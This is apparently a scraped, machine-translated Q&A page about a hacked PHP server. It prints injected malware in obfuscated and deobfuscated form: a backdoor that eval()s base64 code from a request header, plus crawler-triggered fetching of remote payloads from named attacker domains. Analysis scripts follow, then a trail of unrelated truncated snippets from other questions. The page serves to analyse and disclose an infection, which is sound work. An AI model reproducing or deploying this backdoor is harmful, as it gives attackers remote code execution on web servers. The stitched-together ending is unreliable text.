if (@is_writable($Q0QOOO)) {
$I11III = $Q0QOOO; break;
}
}
}
return $I11III;
}
if (strlen($I1ll11) < 10) {
define(I11lIl1I(235, 16), 0);
} elseif ($Q0OO0O=$I1ll11.@$_SERVER[I11lIl1I(175, 15)]) {
$QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
$w3n_code=get_temp_directory().I11lIl1I(253, 2).$QO0O0Q;
define(I11lIl1I(235, 16), $w3n_code);
$IlIlII = $w3n_code.I11lIl1I(257, 6);
if (@$_SERVER[I11lIl1I(267, 15)]==$QO0O0Q) {
$QO0QQ0=I11lIl1I(282, 18);
echo "\r\n";
w3net_output(I11lIl1I(301, 8), $I1lll1.I11lIl1I(310, 2).$IlI11l.I11lIl1I(314, 6));
if ($Q00OQO=$QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])){
@eval($Q00OQO);
echo "\r\n";
w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
}
exit(0);
}
$II11l1 = False;
$Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
if (strpos($Il11I1, $QOOQOO)!==False) {
$Il1Il1 = @fopen($w3n_code.I11lIl1I(257, 6), I11lIl1I(430, 2));
$Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
@fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
@fclose($Il1Il1);
$II11l1=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($II11l1 === True) {
$I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
if (@touch($w3n_code)) {
$Q0OO0O=@urlencode($Q0OO0O);
$I11IIl = I11lIl1I(465, 14).$Q0OO0O.I11lIl1I(482, 4).$QO0O0Q.I11lIl1I(487, 12).$IlI11l.I11lIl1I(503, 4).$I1lll1;
$QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
@touch($w3n_code);
}
}
} else {
define(I11lIl1I(235, 16), 1);
}
}
I11lIl1I(..)
函数再次混淆了一些字符串和函数名称。让我们替换这些:
if (!defined("determinator")) {
if (function_exists("ini_set")) {
@ini_set("allow_url_fopen", 1);
@ini_set("display_errors", 0);
}
function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
$I1lI1I = microtime(true);
return feof($Q0OOOQ);
}
function w3net_getfile($I1ll11, $I11IIl) {
$IIlI1I = "curl";
$I1IIll = $IIlI1I."_init";
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
} elseif (function_exists($I1IIll)){
$QO00QO = @$I1IIll();
$QOOOQQ = $IIlI1I."_setopt";
$IIl11I = $IIlI1I."_exec";
@$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
@$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
@$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
@$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
$IIIl1I = @$IIl11I($QO00QO);
@curl_close($QO00QO);
if (empty($IIIl1I)) {
$IIIl1I = "";
}
return $IIIl1I;
} else {
$Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
if ($Q0OOOQ) {
$I111lI = "";
$I1lI1I = NULL;
@fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
$QOOOQO = PHP_OS."/".PHP_VERSION;
@fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
$I111lI .= @fgets($Q0OOOQ, 128);
}
@fclose($Q0OOOQ);
$Q000OQ = explode("\r\n\r\n", $I111lI);
unset($Q000OQ[0]);
return implode("\r\n\r\n", $Q000OQ);
}
}
}
function w3net_output($I1I1lI, $I1lIll) {
echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
}
function php_server($Q0000Q){
return @$_SERVER[$Q0000Q];
}
$IlI11l="ftp/201309";
$I1lll1="3.01";
$Q0Q0QO="QQ0OQ000000Q0OQ0Q";
$I1ll11="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $I1ll11="https://"; }
}
$I1ll11.=strtolower(@$_SERVER["HTTP_HOST"]);
foreach ($_GET as $I1I1lI=>$I1lIll) {
if (strpos($I1lIll,"union")) {
$_GET[$I1I1lI]="";
} elseif (strpos($I1lIll,"select")) {
$_GET[$I1I1lI]="";
}
}
if(!isset($_SERVER["REQUEST_URI"])) {
$_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
if(isset($_SERVER["QUERY_STRING"])) {
$_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
}
}
function get_temp_directory() {
$I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
$Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );
foreach ($Q0Q00Q as $Q0QOOO){
if (!empty($Q0QOOO)){
$Q0QOOO.=DIRECTORY_SEPARATOR;
if (@is_writable($Q0QOOO)) {
$I11III = $Q0QOOO; break;
}
}
}
return $I11III;
}
if (strlen($I1ll11) < 10) {
define("determinator", 0);
} elseif ($Q0OO0O=$I1ll11.@$_SERVER["REQUEST_URI"]) {
$QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
$w3n_code=get_temp_directory().".".$QO0O0Q;
define("determinator", $w3n_code);
$IlIlII = $w3n_code.".log";
if (@$_SERVER["HTTP_Y_AUTH"]==$QO0O0Q) {
$QO0QQ0="base64_decode";
echo "\r\n";
w3net_output("versio", $I1lll1."-".$IlI11l."-php");
if ($Q00OQO=$QO0QQ0(@$_SERVER["HTTP_EXECPHP"])){
@eval($Q00OQO);
echo "\r\n";
w3net_output("out", "ok");
}
exit(0);
}
$II11l1 = False;
$Il11I1 = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $QOOQOO) {
if (strpos($Il11I1, $QOOQOO)!==False) {
$Il1Il1 = @fopen($w3n_code.".log", "a");
$Ill11I = @urlencode(@$_SERVER["REQUEST_URI"]);
@fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
@fclose($Il1Il1);
$II11l1=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($II11l1 === True) {
$I1Il1I = Array("sezqo.net", "fastaddz.com");
if (@touch($w3n_code)) {
$Q0OO0O=@urlencode($Q0OO0O);
$I11IIl = "/w3.php?u=".$Q0OO0O."&k=".$QO0O0Q."&t=php&p=".$IlI11l."&v=".$I1lll1;
$QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
@touch($w3n_code);
}
}
} else {
define("determinator", 1);
}
}
$hash
(例如,使用
http://www.md5.cz/生成有效的md5哈希值)-两个脚本中的值必须相等!
<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$code = base64_decode(@$_SERVER["HTTP_EXECPHP"]);
$auth = $_SERVER["HTTP_Y_AUTH"];
function store() {
global $code, $auth;
for($N=1; file_exists($fn);++$N) { $fn = "evilphpcode-".$N.txt"; }
file_put_contents($fn, $code);
file_put_contents($fn."-hash", $auth);
}
if ($auth != $hash) { echo "Hi there ;-)"; store(); exit(0); }
$version1="ftp/201309"; $version2="3.01";
function out($key, $val) { echo "Y_".$key.":".$val."\r\n"; }
out("versio", $version2."-".$version1."-php");
sleep(1); store();
echo "\r\n";
out("out", "ok");
?>
<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$url = "http://mydomain.com/path/toscript/script.php"; // <-- put in first scripts location!!!
$url = urlencode($url);
$urltofetch = "http://sezqo.net/w3.php?u=".$url."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = file_get_contents($urltofetch);
echo "OK, request sent!";
?>
关于php - 我的服务器被黑客入侵,注入(inject)了编码代码。我不知道这段代码的目的是什么?请任何人帮助我,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20095387/
我对自定义 CSS 或在将图像作为 Logo 上传到页面时使用编码 block 有疑问。我正在为我的网站使用 squarespace,我需要帮助编码我的 Logo 以使其适合每个页面。一个选项是使用自
如 encoding/json 包文档中所述, Marshal traverses the value v recursively. If an encountered value implement
我必须做一些相当于Java中的iconv -f utf8 -t sjisMS $INPUT_FILE的事情。该命令在 Unix 中 我在java中没有找到任何带有sjisMS的编码。 Java中有Sh
从 PHP 5.3 迁移到 PHP 5.6 后,我遇到了编码问题。我的 MySQL 数据库是 latin1,我的 PHP 文件是 windows-1251。现在一切都显示为“ñëåäíèòå àäðå
我有一个 RScript文件(我们称之为 main.r ),它引用了另一个文件,使用以下代码: source("functions.R") 但是,当我运行 RScript 文件时,它提示以下错误:
我无法设法从 WSDL 创建 RPC/编码风格的代码 - 有谁知道哪个框架可以做到这一点? 带有 adb 和 xmlbeans 映射的 Axis2 无法正常工作(无法处理响应中的肥皂编码)直接使用 X
安装了最新版本的Node.Js()和npm包**(1.2.10)**当我运行 Express 命令来生成项目时,它向我抛出以下错误 buffer.js:240 switch (encoding &
JavaScript中有JSON编码/解码base64编码/解码函数吗? 最佳答案 是的,btoa() 和 atob() 在某些浏览器中可以工作: var enc = btoa("this is so
>>> unicode('восстановление информации', 'utf-16') Traceback (most recent call last): File "", line
我当然熟悉 java.net.URLEncoder 和 java.net.URLDecoder 类。但是,我只需要 HTML 样式的编码。 (我不想将 ' ' 替换为 '+' 等)。我不知道任何只做
有一个非常简单的 SSIS 包: OLE DB Source 通过 View 获取数据(数据库表 nvarchar 或 nchar 中的所有字符串列)。 派生列,用于格式化现有日期并将其添加到数据集(
我正在使用一个在 Node 中进行base64编码的软件,如下所示: const enc = new Buffer('test', 'base64') console.log(enc) 显示: 我正
我试图将带有日语字符的数据插入到 oracle 数据库中。事情是保存在数据库中的是一堆倒置的问号。我该如何解决这个问题 最佳答案 见 http://www.errcode.net/blogs/?p=6
当我在 java 中解压 zip 文件时,我发现文件名中出现了带有重音字符的奇怪行为。 西索: Add File user : L'equipe Technique -- Folder : spec
在网上冲浪我找到了 ExtJS 的 Ext.Gantt 插件,该扩展有一个特殊的编码。任何人都知道如何编码那样或其他复杂的形式。 Encoded Gantt Chart 最佳答案 它似乎被 Dean
我正在用C语言做一个编码任务,我进展顺利,直到读取符号并根据表格分配相应的代码的部分。我必须连接几个代码,直到它们的长度达到 32 位,为此我必须将它们写入一个文件中。这种写入文件的方法给我带来了很多
我有一个外部链接的 javascript 文件。在那个 javascript 里面,我有这个功能: function getMonthNumber(monthName){ monthName = mo
使用mechanize,我检索到一个网页的源页面,其中包含一些非ASCII字符,比如汉字。 代码如下: #using python2.6 from mechanize import Browser b
我有一个包含字母 ø 的文件。当我用这段代码 File.ReadLines(filePath) 读取它时,我得到了一个问号而不是它。 当我像这样添加编码时 File.ReadLines(filePat
如何翻译下面的字符串 H.P. Dembinski, B. K\'{e}gl, I.C. Mari\c{s}, M. Roth, D. Veberi\v{c} 进入 H. P. Dembinski,
我是一名优秀的程序员,十分优秀!